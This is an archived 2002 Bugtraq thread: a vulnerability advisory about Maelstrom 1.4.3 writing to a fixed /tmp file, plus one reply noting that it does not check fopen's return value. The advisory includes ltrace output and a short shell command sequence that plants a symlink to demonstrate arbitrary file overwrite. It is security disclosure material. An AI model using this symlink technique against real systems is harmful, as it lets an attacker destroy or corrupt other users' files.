linux, säkerhet

7850239 2002-01-20 20:16 +1100  /42 rader/ Andrew Griffiths <andrewg@tasmail.com>
Sänt av: joel@lysator.liu.se
Importerad: 2002-01-20  23:13  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <20596>
Ärende: Maelstrom 1.4.3 abartity file overwrite
------------------------------------------------------------
From: "Andrew Griffiths" <andrewg@tasmail.com>
To: bugtraq@securityfocus.com
Message-ID: <200201200916.g0K9GUT13172@franklin.nt.tas.gov.au>

Program: Maelstrom
Version: 1.4.3
Distribution: RedHat 7.1

When trying to break stuff, ltracing Maelstrom showed the following:

fopen("/tmp/f", "w")                              = 0x08081f58
fprintf(0x08081f58, "Main program = %s\n", "Maelstrom") = 25
fclose(0x08081f58)                                = 0

Which made we wonder if it followed symbolic links, by doing

[andrewg@blackhole andrewg]$ rm -f /tmp/f; (umask 077; echo bla >
/tmp/bla; \ ln -s /tmp/bla f)

at which point I ran it again, and when I did cat /tmp/bla, I got

Main program = Maelstrom

Conclusion:
-=-=-=-=-=-

You can overwrite arbitrary files with the permissions of the user
who ran it.

Of course, this won't work on systems that have linking restrictions
in /tmp.

Fixing it
-=-=-=-=-

Remove the code that does the above.


--
www.tasmail.com
(7850239) /Andrew Griffiths <andrewg@tasmail.com>/(Ombruten)
Kommentar i text 7858908 av Chris Gragsone <maetrics@realwarp.net>
7858908 2002-01-21 11:26 -0500  /60 rader/ Chris Gragsone <maetrics@realwarp.net>
Sänt av: joel@lysator.liu.se
Importerad: 2002-01-22  06:13  av Brevbäraren
Extern mottagare: Andrew Griffiths <andrewg@tasmail.com>
Extern kopiemottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <20617>
Kommentar till text 7850239 av Andrew Griffiths <andrewg@tasmail.com>
Ärende: Re: Maelstrom 1.4.3 abartity file overwrite
------------------------------------------------------------
From: Chris Gragsone <maetrics@realwarp.net>
To: Andrew Griffiths <andrewg@tasmail.com>
Cc: bugtraq@securityfocus.com
Message-ID: <3C4C4143.4050002@realwarp.net>

You should also note that Maelstrom doesnt check the return on
fopen(),  nor does it remove the file when it closes.  If you have
multiple users  who run Maelstrom, or just someone who wants to break
stuff.  If the  /tmp/f is owned by another user, or the permissions
are set to  nonwritable.  Maelstrom will segfault when it passes 0 as
the file  stream to fprintf().

--chris

Andrew Griffiths wrote:

> Program: Maelstrom
> Version: 1.4.3
> Distribution: RedHat 7.1
> 
> When trying to break stuff, ltracing Maelstrom showed the following:
> 
> fopen("/tmp/f", "w")                              = 0x08081f58
> fprintf(0x08081f58, "Main program = %s\n", "Maelstrom") = 25
> fclose(0x08081f58)                                = 0
> 
> Which made we wonder if it followed symbolic links, by doing
> 
> [andrewg@blackhole andrewg]$ rm -f /tmp/f; (umask 077; echo bla >  /tmp/bla; \
> ln -s /tmp/bla f)
> 
> at which point I ran it again, and when I did cat /tmp/bla, I got
> 
> Main program = Maelstrom
> 
> Conclusion:
> -=-=-=-=-=-
> 
> You can overwrite arbitrary files with the permissions of the user who ran
> it.
> 
> Of course, this won't work on systems that have linking restrictions in /tmp.
> 
> Fixing it
> -=-=-=-=-
> 
> Remove the code that does the above.
> 
> 
> --
> www.tasmail.com
> 
> 
> 
> 
>
(7858908) /Chris Gragsone <maetrics@realwarp.net>/(Ombruten)